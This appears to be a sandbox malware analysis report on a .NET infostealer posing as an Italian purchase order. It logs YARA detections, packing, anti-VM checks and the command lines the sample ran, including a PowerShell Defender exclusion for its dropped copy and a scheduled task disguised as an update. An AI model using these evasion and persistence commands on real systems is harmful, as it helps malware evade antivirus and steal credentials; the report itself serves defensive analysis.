                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: FNOqSQ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, ISZbPXDvPz.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, ISZbPXDvPz.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, YpS.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 7.2.FNOqSQ.exe.2c2aeb4.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.266aeb0.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 7.2.FNOqSQ.exe.2c8f428.5.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/9@2/2
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile created: C:\Users\user\AppData\Roaming\FNOqSQ.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMutant created: \Sessions\1\BaseNamedObjects\bavwhFhCArCBbpvzH
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\tmpEADA.tmpJump to behavior
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: PUK ITALIA PO 120610549.EXE.exeReversingLabs: Detection: 65%
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile read: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\FNOqSQ.exe C:\Users\user\AppData\Roaming\FNOqSQ.exe
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exeJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmpJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: RIoz.pdb source: PUK ITALIA PO 120610549.EXE.exe, FNOqSQ.exe.0.dr
                    Source: Binary string: RIoz.pdbSHA2563 source: PUK ITALIA PO 120610549.EXE.exe, FNOqSQ.exe.0.dr

                    Data Obfuscation

                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.raw.unpack, ivtNue3aMakjbVsfus.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: PUK ITALIA PO 120610549.EXE.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: FNOqSQ.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: 0xE07D262E [Sat May 7 09:55:58 2089 UTC]
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_024CF1B0 push eax; iretd 0_2_024CF1B1
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_024C756B push eax; iretd 0_2_024C7589
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_07183EE3 pushfd ; iretd 0_2_07183EE9
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_09D6C100 push eax; ret 0_2_09D6C101
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_09D6C85A pushad ; retf 0_2_09D6C925
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_0108F1B0 push eax; iretd 7_2_0108F1B1
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_0108756A push eax; iretd 7_2_01087589
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_05093938 pushfd ; iretd 7_2_05093939
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_050938F0 pushad ; iretd 7_2_050938F1
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_07363EE2 pushfd ; iretd 7_2_07363EE9
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_0736A9DD push FFFFFF8Bh; iretd 7_2_0736A9DF
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: section name: .text entropy: 7.990207486581012
                    Source: FNOqSQ.exe.0.drStatic PE information: section name: .text entropy: 7.990207486581012
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.raw.unpack, H8RxCCTG2lqB13Rl08.csHigh entropy of concatenated method names: 'BWXySrfaKk', 'O1uyJIJkvJ', 'FYuy29LETE', 'Nr6yB8b3kD', 'tquyCnxVtm', 'xG3y49hv1M', 'aMxypkVXs0', 'zXZyj69DS7', 'VfeyH0y2yr', 'ARhyKeRyuC'
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.raw.unpack, ivtNue3aMakjbVsfus.csHigh entropy of concatenated method names: 'hayyrDbcfV', 'RgtTUJcyZL', 'gT8yhPI3jg', 'D4SyXwSaZ8', 'eGDyD0eGyP', 'Q1my3V6pua', 'HJq5kCF3PwuIZ', 'v2v9oltHw', 'V3yxNksFn', 'LmcVIqhFH'
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile created: C:\Users\user\AppData\Roaming\FNOqSQ.exeJump to dropped file

                    Boot Survival

                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exe; Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: PUK ITALIA PO 120610549.EXE.exe PID: 6104, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: FNOqSQ.exe PID: 7584, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMemory allocated: D50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMemory allocated: 2620000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMemory allocated: 23D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMemory allocated: 76A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMemory allocated: 86A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMemory allocated: 8960000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMemory allocated: 9960000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMemory allocated: 1040000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMemory allocated: 29E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMemory allocated: 76E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMemory allocated: 86E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMemory allocated: 8980000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMemory allocated: 9980000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeThread delayed: delay time: 1199969Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWindow / User API: threadDelayed 1670Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWindow / User API: threadDelayed 8140Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7042Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2069Jump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe"
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp"
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe Queries volume information: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe VolumeInformation
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
